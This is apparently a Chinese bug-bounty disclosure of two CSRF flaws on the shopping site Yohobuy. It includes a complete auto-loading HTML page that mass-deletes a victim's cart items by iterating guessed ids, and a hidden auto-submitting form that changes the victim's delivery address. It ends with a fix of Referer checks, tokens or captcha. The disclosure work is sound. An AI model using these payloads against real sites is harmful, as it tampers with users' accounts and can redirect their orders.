YOHO!有货东西很潮很nice,只可惜年终奖要3月份才发,哎不说了。
在这里提交一个csrf批量删除他人购物车商品,主要原因是因为删除购物车商品时不带token,且reffer未做限制

1.打开kali主机,用A账户登录,我们先看看删除自己购物车的数据包,是否带token,或reffer有无限制
 

2.jpg



ok,这里看到没有token的限制,且后面的时间戳1407715543670可以更改,无影响。id所代表的购物车商品一天之内的区间在3555xxxx(昨天购物车的id是3550xxxx)明显和每天整个网站的新加入购物车的总量相关,大概可以推算出每天的购买量哦



2.下面,我们自己制作一个csrfYohu.html内容如下,将其放到主机172.16.1.224上

<html> <head> <title>test</title> <script type="text/javascript"> function show() { var a = new Array(); var i = 1000; for (i = 1000; i <= 9999; i++) { a[i] = "https://www.yohobuy.com/shopping/cart/delone?id=3555" + i + "&is_reduce=0&_=1407715543670"; } var ima = new Array(); for (i = 1; i <= 9000; i++) { var image = document.getElementById("image"); ima[i] = document.createElement('img'); ima[i].src = a[i]; ima[i].height = 0 ima[i].width = 0 image.appendChild(ima[i]); } } </script> </head> <body onload="javascript:show()"> <p id="image"> </p> </body> </html>





3.一个win7主机下已经登录YOHU的账户B,访问https://172.16.1.224/csrfYohu.html中招,开始自动遍历狂删账户B的购物车内容
 

10.jpg



删除前的购物车
 

3.jpg



跑了半分钟,发现购物车少了一件!@@!
 

12.jpg





csrf攻击成功





//////////////////////////////

接下来看一下修改地址的csrf

思路和上面一样,先修改地址抓包看看是否有token,发现没有

好的,做一个html放在https://172.16.1.224欺骗受害者点击。内容如下,隐藏网页,post提交,最后一个post参数id随便改,测试中发现没用

<form method='post' action='https://www.yohobuy.com/home/address/save'> <input type='text' value='月月' name='addressee_name' style='display:none!important;display:block;width=0;height=0' /> <input type='text' value='上海中心' name='address' style='display:none!important;display:block;width=0;height=0' /> <input type='text' value='100000' name='zip_code' style='display:none!important;display:block;width=0;height=0' /> <input type='text' value='12345678' name='phone' style='display:none!important;display:block;width=0;height=0' /> <input type='text' value='18512345678' name='mobile' style='display:none!important;display:block;width=0;height=0' /> <input type='text' value='[email protected]' name='email' style='display:none!important;display:block;width=0;height=0' /> <input type='text' value='110101' name='area_code' style='display:none!important;display:block;width=0;height=0' /> <input type='text' value='1932100' name='id' style='display:none!important;display:block;width=0;height=0' /> </form> <script>document.forms[0].submit(); </script>


 

address4.jpg



用python验证一下urlencode编码正确
 

urlencode.jpg



发现csrf修改地址成功
 

address5.jpg


 

address6.jpg


一个win7主机下已经登录YOHU的账户B,访问https://172.16.1.224/csrfYohu.html中招,开始自动遍历狂删账户B的购物车内容
 

10.jpg



删除前的购物车
 

3.jpg



跑了半分钟,发现购物车少了一件!@@!
 

12.jpg







发现csrf修改地址成功
 

address5.jpg


 

address6.jpg


 

解决方案:

reffer 检查,或者token引入,再不济就验证码!@@!